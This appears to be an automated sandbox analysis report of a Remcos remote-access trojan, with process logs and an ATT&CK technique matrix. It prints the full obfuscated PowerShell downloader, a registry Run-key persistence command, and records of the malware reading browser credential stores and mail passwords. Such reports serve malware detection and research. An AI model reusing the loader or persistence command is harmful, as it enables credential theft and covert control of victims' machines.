P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,msMundps,ntr ReniV ounTriaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cgtcjah"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\miynksssgv"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\miynksssgv"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pclglkctcdois"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#derindad telefonkdes kroforvalterens knudshoveds #>;$overimpressed215='steroider115';<#meso allittereredes sidelngder petroleumsovn markedsfringsomkostning #>;$omittancesforstrke116=$beseemingness+$host.ui;function foreslaa($tvivlstilfldet){if ($omittancesforstrke116) {$photoelectronics++;}$transformationsprocesser=$selskabsrevisors+$tvivlstilfldet.'length'-$photoelectronics; for( $omittance=4;$omittance -lt $transformationsprocesser;$omittance+=5){$benzanthrone++;$vandsskader+=$tvivlstilfldet[$omittance];$styreformerne15='uproblematiske';}$vandsskader;}function heraclitean($shagrag){ & ($liljekonvals) ($shagrag);}$noden=foreslaa 'cuprmtorpostigzsc tiuninls orlcarbaskul/lige ';$noden+=foreslaa 'intr5 od.slip0poli omf( ed wbairipreinrummd in orandwhumoskjru feman rect sta ste1 cab0jux .ixo 0 for;sind talawgorbivaesnhem 6.tvk4afst; v.d sattxst.b6kabo4p.lk; pet visur etev udh:khed1agit3brig1else. lai0edul)deli spirgslage roclandkdemoow ys/ .ri2di k0 .en1,ijo0rest0auto1enla0id.o1s am bosfafskimarkrp omef ihf teo,entxrobo/u es1sand3trav1 cou.indl0a em ';$deglutitive=foreslaa 'motiusne,shjese an.rbou - redaoto g k te chenn nstoxgo ';$spisekortet=foreslaa 'glach p.itsubstmod.pdogg:tiec/ i.t/connahererfesttu.viiansaefa nr dirici r.cl.nrdecaohypn/at ogsfol/tessspersk r,lieksifsko f gale.uchrnor d ernkty ek un ebor re itssprj.nunnpobstcengrx.jla ';$allineate=foreslaa 'fila>f.ru ';$liljekonvals=foreslaa '.amuibisaepo.kxcor ';$brneormens='sybaritternes';$omittanceronsided='\rgnes.und';heraclitean (foreslaa 'forb$ko,fgshorlunifoepigbc moasaprlomf :kautfpromou gyzpoutiforfnsu,pe addsluneskins=co.e$ lu,equesnsvnlvdell:unscanonvpringpdisudkakia omatequiathys+komp$ oodosn wmu piinoontawartmag abearnzibecforteunderkil o o,enyppessystiaftedfariediopdmukk ');heraclitean (foreslaa 'or a$svorg l,vlce.toko,mbsolba hyplout,:waremweara p aru,vojbenfu so,nfor sanop= cos$conush.ftpfan i isosrochelat k chaouncoromk,tchereliertne.p.es asoriep strls vsilocutafgi( min$akkuag nzl collphali bden higes nga armtiliaetric) sta ');heraclitean (foreslaa 'pane[esconmythedrysthelt.scots nhetovbrpladvrdbricentcafb evas p ynaoo.tbibedsnparat vapm orkaforbnmarmapennghoppeshirrhals].nal:leve:,uttshov elovmcdisbu ,arrerriieschtu brydelkp antrteosotunntkulko nolcudhoorendlpe.s prey=data u,or[ ulen uketoldt gez.af,askl,keconscformune trmanuigysetspiryprevpc.arrunr,ostamtce lophascstamod sil nomtaqqay f lpschie ufo]fend:e.cy:rstetw nwlomk sberr1for,2siti ');$spisekortet=$marjuns[0];$resident=(foreslaa 'para$carag,verl feboforebse mabattlrveh: ordogoosvw gee evereupsssu cp ad rprofig,leni nkghyrae,kerlskn.scandes bcrde h=fljenu.tre exewnon.-b skobarnbtrskjwoodeoptrcutydt pre uncswresy sanssterth,ttearmompost. ditnnitret.avto pa. sumw d mezealb ealcsuboluntwiperie prenintetth e ');heraclitean ($resident);heraclitean (foreslaa 'hand$klagopecuvdyste halrst,msmundps,ntr reniv ountria
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#derindad telefonkdes kroforvalterens knudshoveds #>;$overimpressed215='steroider115';<#meso allittereredes sidelngder petroleumsovn markedsfringsomkostning #>;$omittancesforstrke116=$beseemingness+$host.ui;function foreslaa($tvivlstilfldet){if ($omittancesforstrke116) {$photoelectronics++;}$transformationsprocesser=$selskabsrevisors+$tvivlstilfldet.'length'-$photoelectronics; for( $omittance=4;$omittance -lt $transformationsprocesser;$omittance+=5){$benzanthrone++;$vandsskader+=$tvivlstilfldet[$omittance];$styreformerne15='uproblematiske';}$vandsskader;}function heraclitean($shagrag){ & ($liljekonvals) ($shagrag);}$noden=foreslaa 'cuprmtorpostigzsc tiuninls orlcarbaskul/lige ';$noden+=foreslaa 'intr5 od.slip0poli omf( ed wbairipreinrummd in orandwhumoskjru feman rect sta ste1 cab0jux .ixo 0 for;sind talawgorbivaesnhem 6.tvk4afst; v.d sattxst.b6kabo4p.lk; pet visur etev udh:khed1agit3brig1else. lai0edul)deli spirgslage roclandkdemoow ys/ .ri2di k0 .en1,ijo0rest0auto1enla0id.o1s am bosfafskimarkrp omef ihf teo,entxrobo/u es1sand3trav1 cou.indl0a em ';$deglutitive=foreslaa 'motiusne,shjese an.rbou - redaoto g k te chenn nstoxgo ';$spisekortet=foreslaa 'glach p.itsubstmod.pdogg:tiec/ i.t/connahererfesttu.viiansaefa nr dirici r.cl.nrdecaohypn/at ogsfol/tessspersk r,lieksifsko f gale.uchrnor d ernkty ek un ebor re itssprj.nunnpobstcengrx.jla ';$allineate=foreslaa 'fila>f.ru ';$liljekonvals=foreslaa '.amuibisaepo.kxcor ';$brneormens='sybaritternes';$omittanceronsided='\rgnes.und';heraclitean (foreslaa 'forb$ko,fgshorlunifoepigbc moasaprlomf :kautfpromou gyzpoutiforfnsu,pe addsluneskins=co.e$ lu,equesnsvnlvdell:unscanonvpringpdisudkakia omatequiathys+komp$ oodosn wmu piinoontawartmag abearnzibecforteunderkil o o,enyppessystiaftedfariediopdmukk ');heraclitean (foreslaa 'or a$svorg l,vlce.toko,mbsolba hyplout,:waremweara p aru,vojbenfu so,nfor sanop= cos$conush.ftpfan i isosrochelat k chaouncoromk,tchereliertne.p.es asoriep strls vsilocutafgi( min$akkuag nzl collphali bden higes nga armtiliaetric) sta ');heraclitean (foreslaa 'pane[esconmythedrysthelt.scots nhetovbrpladvrdbricentcafb evas p ynaoo.tbibedsnparat vapm orkaforbnmarmapennghoppeshirrhals].nal:leve:,uttshov elovmcdisbu ,arrerriieschtu brydelkp antrteosotunntkulko nolcudhoorendlpe.s prey=data u,or[ ulen uketoldt gez.af,askl,keconscformune trmanuigysetspiryprevpc.arrunr,ostamtce lophascstamod sil nomtaqqay f lpschie ufo]fend:e.cy:rstetw nwlomk sberr1for,2siti ');$spisekortet=$marjuns[0];$resident=(foreslaa 'para$carag,verl feboforebse mabattlrveh: ordogoosvw gee evereupsssu cp ad rprofig,leni nkghyrae,kerlskn.scandes bcrde h=fljenu.tre exewnon.-b skobarnbtrskjwoodeoptrcutydt pre uncswresy sanssterth,ttearmompost. ditnnitret.avto pa. sumw d mezealb ealcsuboluntwiperie prenintetth e ');heraclitean ($resident);heraclitean (foreslaa 'hand$klagopecuvdyste halrst,ms
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#derindad telefonkdes kroforvalterens knudshoveds #>;$overimpressed215='steroider115';<#meso allittereredes sidelngder petroleumsovn markedsfringsomkostning #>;$omittancesforstrke116=$beseemingness+$host.ui;function foreslaa($tvivlstilfldet){if ($omittancesforstrke116) {$photoelectronics++;}$transformationsprocesser=$selskabsrevisors+$tvivlstilfldet.'length'-$photoelectronics; for( $omittance=4;$omittance -lt $transformationsprocesser;$omittance+=5){$benzanthrone++;$vandsskader+=$tvivlstilfldet[$omittance];$styreformerne15='uproblematiske';}$vandsskader;}function heraclitean($shagrag){ & ($liljekonvals) ($shagrag);}$noden=foreslaa 'cuprmtorpostigzsc tiuninls orlcarbaskul/lige ';$noden+=foreslaa 'intr5 od.slip0poli omf( ed wbairipreinrummd in orandwhumoskjru feman rect sta ste1 cab0jux .ixo 0 for;sind talawgorbivaesnhem 6.tvk4afst; v.d sattxst.b6kabo4p.lk; pet visur etev udh:khed1agit3brig1else. lai0edul)deli spirgslage roclandkdemoow ys/ .ri2di k0 .en1,ijo0rest0auto1enla0id.o1s am bosfafskimarkrp omef ihf teo,entxrobo/u es1sand3trav1 cou.indl0a em ';$deglutitive=foreslaa 'motiusne,shjese an.rbou - redaoto g k te chenn nstoxgo ';$spisekortet=foreslaa 'glach p.itsubstmod.pdogg:tiec/ i.t/connahererfesttu.viiansaefa nr dirici r.cl.nrdecaohypn/at ogsfol/tessspersk r,lieksifsko f gale.uchrnor d ernkty ek un ebor re itssprj.nunnpobstcengrx.jla ';$allineate=foreslaa 'fila>f.ru ';$liljekonvals=foreslaa '.amuibisaepo.kxcor ';$brneormens='sybaritternes';$omittanceronsided='\rgnes.und';heraclitean (foreslaa 'forb$ko,fgshorlunifoepigbc moasaprlomf :kautfpromou gyzpoutiforfnsu,pe addsluneskins=co.e$ lu,equesnsvnlvdell:unscanonvpringpdisudkakia omatequiathys+komp$ oodosn wmu piinoontawartmag abearnzibecforteunderkil o o,enyppessystiaftedfariediopdmukk ');heraclitean (foreslaa 'or a$svorg l,vlce.toko,mbsolba hyplout,:waremweara p aru,vojbenfu so,nfor sanop= cos$conush.ftpfan i isosrochelat k chaouncoromk,tchereliertne.p.es asoriep strls vsilocutafgi( min$akkuag nzl collphali bden higes nga armtiliaetric) sta ');heraclitean (foreslaa 'pane[esconmythedrysthelt.scots nhetovbrpladvrdbricentcafb evas p ynaoo.tbibedsnparat vapm orkaforbnmarmapennghoppeshirrhals].nal:leve:,uttshov elovmcdisbu ,arrerriieschtu brydelkp antrteosotunntkulko nolcudhoorendlpe.s prey=data u,or[ ulen uketoldt gez.af,askl,keconscformune trmanuigysetspiryprevpc.arrunr,ostamtce lophascstamod sil nomtaqqay f lpschie ufo]fend:e.cy:rstetw nwlomk sberr1for,2siti ');$spisekortet=$marjuns[0];$resident=(foreslaa 'para$carag,verl feboforebse mabattlrveh: ordogoosvw gee evereupsssu cp ad rprofig,leni nkghyrae,kerlskn.scandes bcrde h=fljenu.tre exewnon.-b skobarnbtrskjwoodeoptrcutydt pre uncswresy sanssterth,ttearmompost. ditnnitret.avto pa. sumw d mezealb ealcsuboluntwiperie prenintetth e ');heraclitean ($resident);heraclitean (foreslaa 'hand$klagopecuvdyste halrst,msmundps,ntr reniv ountriaJump to behavior
                Source: msiexec.exe, 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerU9
                Source: msiexec.exe, 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: msiexec.exe, 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managera
                Source: msiexec.exe, 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerO
                Source: msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0
                Source: msiexec.exe, 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager+
                Source: msiexec.exe, 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerLW\
                Source: msiexec.exe, 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS
                Source: msiexec.exe, 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager2
                Source: msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2429498672.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2430114623.000000000632E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: msiexec.exe, 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managervidera
                Source: msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21F52933 cpuid 9_2_21F52933
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21F52264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_21F52264
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,15_2_004082CD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041739B GetVersionExW,13_2_0041739B

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000009.00000002.3037991742.00000000002AE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3042211181.00000000062AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5172, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword15_2_004033F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword15_2_00402DB3
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword15_2_00402DB3
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5172, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 412, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-JTPTLWJump to behavior
                Source: Yara matchFile source: 00000009.00000002.3037991742.00000000002AE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3042211181.00000000062AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5172, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts1
                Windows Management Instrumentation
                1
                Scripting
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                2
                Obfuscated Files or Information
                1
                Credentials in Registry
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts22
                Command and Scripting Interpreter
                1
                Registry Run Keys / Startup Folder
                412
                Process Injection
                1
                Software Packing
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares2
                Clipboard Data
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                PowerShell
                Login Hook1
                Registry Run Keys / Startup Folder
                1
                DLL Side-Loading
                NTDS27
                System Information Discovery
                Distributed Component Object ModelInput Capture1
                Remote Access Software
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets41
                Security Software Discovery
                SSHKeylogging2
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Modify Registry
                Cached Domain Credentials31
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture213
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion
                DCSync4
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
